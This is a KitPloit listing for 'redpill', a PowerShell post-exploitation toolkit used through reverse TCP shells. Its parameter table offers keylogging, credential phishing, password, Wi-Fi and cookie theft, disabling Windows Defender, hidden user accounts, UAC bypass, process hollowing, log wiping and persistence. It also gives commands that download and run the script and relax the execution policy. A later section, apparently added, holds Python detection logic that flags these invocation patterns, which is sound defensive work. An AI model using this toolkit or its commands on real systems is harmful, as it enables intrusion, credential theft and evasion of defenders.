Redpill - Assist Reverse Tcp Shells In Post-Exploration Tasks

2021-06-14T12:30:00
ID KITPLOIT:97003539315531987
Type kitploit
Reporter KitPloit
Modified 2021-06-14T12:30:00

Description

Project Description

The redpill project aims to assist reverse tcp shells in post-exploitation tasks. Often in red team engagements we
need to use unconventional ways to access the target system, such as reverse tcp shells (_not metasploit_) in order
to bypass the defenses implemented by the system administrator. After the first stage has been successfully completed
we face another kind of problem: _"I have (shell) access to the target system, and now what can I do with it?"_

This project consists of several PowerShell scripts that perform different _post-exploitation_ functions and the
main script _redpill.ps1_, whose job is to download, configure and execute the scripts contained in this repository.

The goal is to have a meterpreter-like experience in our reverse tcp shell prompt (options similar to meterpreter's).

Folder Name | Description | Notes
---|---|---
Bin | Contains redpill main modules | Sysinfo, GetConnections, Persiste, Keylogger, etc.
Bypass | Contains redpill bypass scripts | Manual download/execution required
modules | Contains redpill modules | Sherlock, CredsPhish, Webserver, StartWebServer, etc.
Utils | Contains BAT and PS1 scripts | Manual execution required

CmdLet parameter syntax and examples

This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.
venom amsi evasion agents automatically upload this CmdLet to the %TMP% directory so it is
easily accessible in our reverse tcp shell (shell prompt).

_To list all available parameters, execute in the powershell prompt:_

.\redpill.ps1 -Help Parameters

CmdLet Parameter Name | Parameter Arguments | Description
---|---|---
-SysInfo | Enum / Verbose | Quick System Info OR Verbose Enumeration
-GetConnections | Enum / Verbose | Enumerate Remote Host Active TCP Connections
-GetDnsCache | Enum / Clear | Enumerate / Clear remote host DNS cache entries
-GetInstalled | Enum | Enumerate Remote Host Applications Installed
-GetProcess | Enum / Kill / Tokens | Enumerate OR Kill Remote Host Running Process(es)
-GetTasks | Enum / Create / Delete | Enumerate / Create / Delete Remote Host Running Tasks
-GetLogs | Enum / Verbose / Clear | Enumerate eventvwr logs OR Clear All event logs
-GetBrowsers | Enum / Verbose / Creds | Enumerate Installed Browsers and Versions OR Verbose
-Screenshot | 1 | Capture 1 Desktop Screenshot and Store it in %TMP%
-Camera | Enum / Snap | Enumerate computer webcams OR capture default webcam snapshot
-StartWebServer | Python / Powershell | Download webserver to %TMP% and execute the WebServer
-Keylogger | Start / Stop | Start OR Stop recording remote host keystrokes
-MouseLogger | Start | Capture Screenshots of Mouse Clicks for 10 seconds
-PhishCreds | Start / Brute | Prompt current user for a valid credential and leak captures
-GetPasswords | Enum / Dump | Enumerate passwords from different locations {Store, Regedit, Disk}
-WifiPasswords | Dump / ZipDump | Enumerate Available SSIDs OR ZipDump All Wifi passwords
-EOP | Enum / Verbose | Find Missing Software Patches for Privilege Escalation
-ADS | Enum / Create / Exec / Clear | Hide scripts {bat, ps1, exe} on $DATA records (ADS)
-BruteZip | $Env:TMP\archive.zip | Brute force selected Zip archive with the help of 7z.exe
-Upload | script.ps1 | Upload script.ps1 from attacker apache2 webroot
-Persiste | $Env:TMP\Script.ps1 | Persist script.ps1 on every startup {BeaconHome}
-CleanTracks | Clear / Paranoid | Clean disk artifacts left behind {clean system tracks}
-AppLocker | Enum / WhoAmi / TestBat | Enumerate AppLocker Directories with weak permissions
-FileMace | $Env:TMP\test.txt | Change File MACE {CreationTime, LastAccessTime, LastWriteTime}
-MetaData | $Env:TMP\test.exe | Display file / application description (metadata)
-PEHollow | GetSystem / $Env:TMP\test.exe | Process Hollowing {impersonate explorer.exe as parent}
-MsgBox | "Hello World." | Spawns "Hello World." msgBox on local host {wscriptComObject}
-SpeakPrank | "Hello World." | Make remote host speak user input sentence {prank}
-NetTrace | Enum | Aggressive Enumeration with the help of netsh {native}
-PingSweep | Enum / Verbose | Enumerate Active IP Addresses and open ports on Local LAN
-DnsSpoof | Enum / Redirect / Clear | Redirect Domain Names to our Phishing IP address
-DisableAV | Query / Start / Stop | Disable Windows Defender Service (WinDefend)
-HiddenUser | Query / Create / Delete | Query / Create / Delete Hidden User Accounts
-CsOnTheFly | Compile / Execute | Download, Compile (to exe) and Execute CS scripts
-CookieHijack | Dump / History | Edge / Chrome Cookie Hijacking tool
-UacMe | Bypass / Elevate / Clean | UAC bypass / EOP by dll reflection (cmstp.exe)

_To display detailed information about each parameter, execute:_

Syntax : .\redpill.ps1 -Help [ -Parameter Name ]  
Example: .\redpill.ps1 -Help WifiPasswords

Instructions on how to use the Cmdlet {_Local tests_}


This section describes how to test this Cmdlet locally without exploiting a target host.

1º - Download the CmdLet from the GitHub repository to _'Local Disk'_

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1

2º - Set Powershell Execution Policy to _'UnRestricted'_

Set-ExecutionPolicy UnRestricted -Scope CurrentUser

3º - Browse to the _'redpill.ps1'_ storage directory

cd C:\Users\pedro\Desktop

4º - Access CmdLet Help Menu {All Parameters}

.\redpill.ps1 -Help Parameters

5º - Access _[ -WifiPasswords ]_ Detailed Parameter Help

Syntax : .\redpill.ps1 -Help [ -Parameter Name ]  
Example: .\redpill.ps1 -Help WifiPasswords

6º - Running _[ -WifiPasswords ] [ Dump ]_ Module

Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]  
Example: .\redpill.ps1 -WifiPasswords Dump

7º - Running _[ -sysinfo ] [ Enum ]_ Module

Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]  
Example: .\redpill.ps1 -sysinfo Enum

Instructions on how to use the CmdLet under _Venom v1.0.17.8_


1º - Execute in the reverse tcp shell prompt

[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters

2º - Access _[ -WifiPasswords ]_ Detailed Parameter Help

[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords

3º - Running _[ -WifiPasswords ] [ Dump ]_ Module

[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump

To manually download the CmdLet for local tests, execute:

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1
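Seen from the defender's side, the invocation pattern documented in the local-test and venom sections above (a script staged in %TMP%, launched as `powershell -File redpill.ps1 -<Module> <Argument>`, preceded by an execution-policy change and a download from the raw.githubusercontent.com repository path) can be turned into process-creation detection logic. The following Python is an added example, not part of the redpill project or of KitPloit's page; the record layout (working directory plus command line) and the sample events are constructed, and the switch list is copied from the parameter table above.

```python
import re

# Module switch names copied from the redpill parameter table on this page.
REDPILL_SWITCHES = {
    "sysinfo", "getconnections", "getdnscache", "getinstalled", "getprocess", "gettasks",
    "getlogs", "getbrowsers", "screenshot", "camera", "startwebserver", "keylogger",
    "mouselogger", "phishcreds", "getpasswords", "wifipasswords", "eop", "ads", "brutezip",
    "upload", "persiste", "cleantracks", "applocker", "filemace", "metadata", "pehollow",
    "msgbox", "speakprank", "nettrace", "pingsweep", "dnsspoof", "disableav", "hiddenuser",
    "csonthefly", "cookiehijack", "uacme",
}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp(\\|$)|%TE?MP%", re.IGNORECASE)
PS_FILE = re.compile(r'powershell(?:\.exe)?\b.*?\s-File\s+"?([^\s"]+)', re.IGNORECASE)
SWITCH = re.compile(r"(?<!\S)-([A-Za-z]+)")
POLICY = re.compile(r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.IGNORECASE)
REPO = re.compile(r"raw\.githubusercontent\.com/r00t-3xp10it/redpill/", re.IGNORECASE)

def indicators(cwd: str, cmdline: str) -> list[str]:
    """Return the redpill-related indicators found in one process-creation record."""
    hits = []
    m = PS_FILE.search(cmdline)
    if m:
        script = m.group(1)
        # A relative -File path resolves against the process working directory.
        full = script if ":\\" in script or script.startswith("%") else cwd.rstrip("\\") + "\\" + script
        if TEMP_DIR.search(full):
            hits.append("ps-script-run-from-temp")
        if full.lower().endswith("\\redpill.ps1"):
            hits.append("script-name:redpill.ps1")
        for sw in SWITCH.findall(cmdline):
            if sw.lower() in REDPILL_SWITCHES:
                hits.append("redpill-switch:" + sw.lower())
    if POLICY.search(cmdline):
        hits.append("execution-policy-relaxed")
    if REPO.search(cmdline):
        hits.append("download-from-redpill-repo")
    return hits

# Constructed process-creation records (working directory, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Users\pedro\AppData\Local\Temp", "powershell -File redpill.ps1 -WifiPasswords Dump"),
    (r"C:\Users\pedro\Desktop", 'powershell "Set-ExecutionPolicy UnRestricted -Scope CurrentUser"'),
    (r"C:\Users\pedro\Desktop", "powershell iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1"),
    (r"C:\Windows\System32", r"powershell.exe -File C:\Scripts\backup.ps1 -Verbose"),
]

def scan(events):
    """Return (command line, indicators) for every record that carries at least one indicator."""
    flagged = [(cmd, indicators(cwd, cmd)) for cwd, cmd in events]
    return [row for row in flagged if row[1]]
```

On real telemetry the working directory and command line would come from Sysmon event 1 or Security event 4688 with command-line auditing enabled; the benign fourth record shows that a plain `-File` launch outside %TMP% produces no hit.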

Video Tutorials

Demonstration - This tutorial uses: sysinfo, GetPasswords, UacMe modules
MouseLogger - Capture Screenshots of 'MouseClicks' with the help of psr.exe
PhishCreds - Phish for login credentials OR Brute Force user account password
FileMace - Change File TimeStamp {CreationTime, LastAccessTime, LastWriteTime}
CsOnTheFly - Download (from url), Auto-Compile and Execute CS scripts On-The-Fly!
EOP - Find missing software patches for privilege escalation

Acknowledgments
hax0r | Function | OS Flavor
---|---|---
_@youhacker55_ | For All the help Debugging this cmdlet (Testing BETA version) | Windows 7 x64bits
_@0xyg3n_ | For All the help Debugging this cmdlet (Testing BETA version) | Windows 10 x64bits
_@Shanty_Damayanti_ | Debugging this cmdlet (amsi string detection bypasses) | Windows 10 x64bits
_@miltinhoc_ | Debugging this cmdlet and recording video tutorials | Windows 10 x64bits

Any collaborations or bug reports are welcome

SuspiciousShellActivity - RedTeam @2021

Download Redpill